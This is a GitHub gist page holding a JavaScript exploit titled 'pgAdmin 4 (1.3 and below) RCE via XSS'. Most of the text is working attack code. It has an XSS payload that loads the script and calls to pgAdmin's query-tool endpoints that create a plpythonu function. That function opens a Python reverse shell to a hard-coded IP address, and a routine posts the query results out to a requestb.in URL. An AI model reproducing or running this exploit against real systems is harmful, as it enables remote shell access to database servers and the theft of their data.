Skip to content

Instantly share code, notes, and snippets.

@evilpacket

evilpacket/cmd_exec.js

Created April 16, 2017 17:43
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save evilpacket/16315679e34f200342fe513b9a60396f to your computer and use it in GitHub Desktop.
Save evilpacket/16315679e34f200342fe513b9a60396f to your computer and use it in GitHub Desktop.
Download ZIP
pgAdmin 4 (1.3 and below) RCE via XSS
Raw
cmd_exec.js
// select '<img src="x" onerror=$.getScript("http://127.0.0.1:8000/cmd_exec.js") />';
// multi-query payload for RCE
var queries = ['create language plpythonu','CREATE OR REPLACE FUNCTION pwn() RETURNS text\\nLANGUAGE plpythonu\\nAS $$\\nimport socket,subprocess,os\\ns=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\\ns.connect((\\"162.242.167.28\\",4445))\\nos.dup2(s.fileno(),0)\\nos.dup2(s.fileno(),1)\\nos.dup2(s.fileno(),2)\\na=subprocess.Popen([\\"/bin/sh\\",\\"-i\\"])\\nreturn \\"\\"\\n$$;\\n', 'select pwn()']
//queries = ['select current_user']
var exfil_url = 'http://requestb.in/16wy0z61'
var exfil = function (data) {
//alert('exfiltrating....');
$.post(exfil_url, {data: JSON.stringify(data)}, function () {
});
}
var exec = function (query, cb) {
var results;
// DB List
$.get('/browser/database/nodes/1/1/', function (response) {
var d = JSON.stringify(response.data);
var doStuff = function (arr) {
if (arr.length == 0) {
//alert('do stuff1 called');
return cb(results);
}
var id = arr.shift()._id;
// Query Tool Init
$.post('/datagrid/initialize/query_tool/1/' + id, function (response) {
var gridTransId = response.data.gridTransId;
// Make Query
$.ajax('/sqleditor/query_tool/start/' + gridTransId, {
type: 'post',
data: '"' + query + '"',
dataType: 'json',
contentType: 'application/json',
success: function(response) {
// Get Results
setTimeout(function () {
$.get('/sqleditor/poll/' + gridTransId, function (response) {
//exfil(response.data.result);
results = response.data.result;
//alert('do stuff2 called');
return doStuff(arr);
}).fail(function (err) {
//alert(JSON.stringify(arguments))
//alert('do stuff3 called');
return doStuff(arr);
})
}, 0);
}
}).fail(function () {
//alert('do stuff4 called');
return doStuff(arr);
})
}).fail(function () {
//alert('do stuff4 called');
return doStuff(arr);
})
}
doStuff(response.data);
});
}
var doQuery = function (queries) {
if (queries.length == 0) {
//alert('ALL DONE');
return; // all done
}
var q = queries.shift();
exec(q, function (result) {
console.log('Done with ' + q);
exfil(result);
return doQuery(queries);
});
}
doQuery(queries);
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment